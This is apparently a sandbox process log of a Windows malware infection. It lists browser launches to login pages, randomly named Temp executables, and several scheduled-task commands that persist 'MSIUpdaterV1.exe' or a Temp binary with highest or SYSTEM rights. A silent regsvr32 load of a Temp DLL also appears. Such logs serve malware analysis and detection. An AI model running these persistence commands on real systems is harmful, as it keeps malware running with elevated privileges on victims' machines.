"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Users\Admin\AppData\Local\Temp\F0B4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\hGnIVTJbniiugaulndqv.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\hGnIVTJbniiugaulndqv.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 HR" /sc HOURLY /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2276 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc82e646f8,0x7ffc82e64708,0x7ffc82e64718

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1\MSIUpdaterV1.exe" /tn "MSIUpdaterV1 LG" /sc ONLOGON /rl HIGHEST

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4528 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,2525749010093275192,12174032622444560376,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffc6f829758,0x7ffc6f829768,0x7ffc6f829778

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4028 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,10262843961557492095,15357762294570849128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2264,17364547049839875453,10625535688629497048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.0.362609268\2099137141" -parentBuildID 20221007134813 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6e4828f-f9bb-4a81-8eb7-010578d8f589} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 1960 1b8b79eb758 gpu

C:\Users\Admin\AppData\Local\Temp\heidi6DbP_N64XGcl\Gt_q28K1Pij1MddE1Ptw.exe

"C:\Users\Admin\AppData\Local\Temp\heidi6DbP_N64XGcl\Gt_q28K1Pij1MddE1Ptw.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.1.1762859660\896436887" -parentBuildID 20221007134813 -prefsHandle 2416 -prefMapHandle 2412 -prefsLen 21565 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2cde6dca-4aa1-4228-b1f3-192c8fc69211} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 2452 1b8b7140b58 socket

C:\Users\Admin\AppData\Local\Temp\FF5.exe

C:\Users\Admin\AppData\Local\Temp\FF5.exe

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.2.1389827356\513907467" -childID 1 -isForBrowser -prefsHandle 3008 -prefMapHandle 1324 -prefsLen 21668 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d50720fd-0bff-4811-a940-289057a83064} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 2964 1b8bb5ead58 tab

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2232 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:2

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.3.571719448\226535996" -childID 2 -isForBrowser -prefsHandle 3544 -prefMapHandle 3540 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc0a1d06-a136-4fff-b8c3-c9b93cb0c836} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 3552 1b8aad61958 tab

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3144 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\GCWEHT8K4v5SdsJZFtFi.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\GCWEHT8K4v5SdsJZFtFi.exe"

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4060 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2992 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1956 --field-trial-handle=2024,i,5557749574225615445,7883934478427062869,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1668 --field-trial-handle=2004,i,2302472976579425981,17844444468222244877,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5040 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=2004,i,2302472976579425981,17844444468222244877,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3624 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1812 --field-trial-handle=2024,i,5557749574225615445,7883934478427062869,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4528 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3120 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.5.100219316\362446075" -childID 4 -isForBrowser -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc981a1e-d3d0-42d0-aefc-68d5a07a27b4} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 5012 1b8bdbbc758 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6516.4.134982506\89800635" -childID 3 -isForBrowser -prefsHandle 4856 -prefMapHandle 4852 -prefsLen 26206 -prefMapSize 233444 -jsInitHandle 1052 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23bcb338-f14e-4c48-94b9-94b81ed53430} 6516 "\\.\pipe\gecko-crash-server-pipe.6516" 4868 1b8aad66858 tab

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gloyEKczR"

C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\V1FkYflsSuINyVwTTmob.exe

"C:\Users\Admin\AppData\Local\Temp\heidip5qbJ3INLYaz\V1FkYflsSuINyVwTTmob.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bokvhhUgtHQNbUrNPU" /SC once /ST 17:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis\gCckOLUAyUDZmqr\FwvfrvJ.exe\" r1 /PXsite_idcxh 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\3EA7.exe

C:\Users\Admin\AppData\Local\Temp\3EA7.exe

C:\Users\Admin\AppData\Local\Temp\is-D1NJE.tmp\3EA7.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D1NJE.tmp\3EA7.tmp" /SL5="$50372,4061719,54272,C:\Users\Admin\AppData\Local\Temp\3EA7.exe"

C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe

"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -i

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4488 --field-trial-handle=1996,i,10485460941861558138,4091259679817495077,131072 /prefetch:1

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\489B.dll

C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe

"C:\Users\Admin\AppData\Local\Info Tool Extension\infotoolext.exe" -s

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\489B.dll

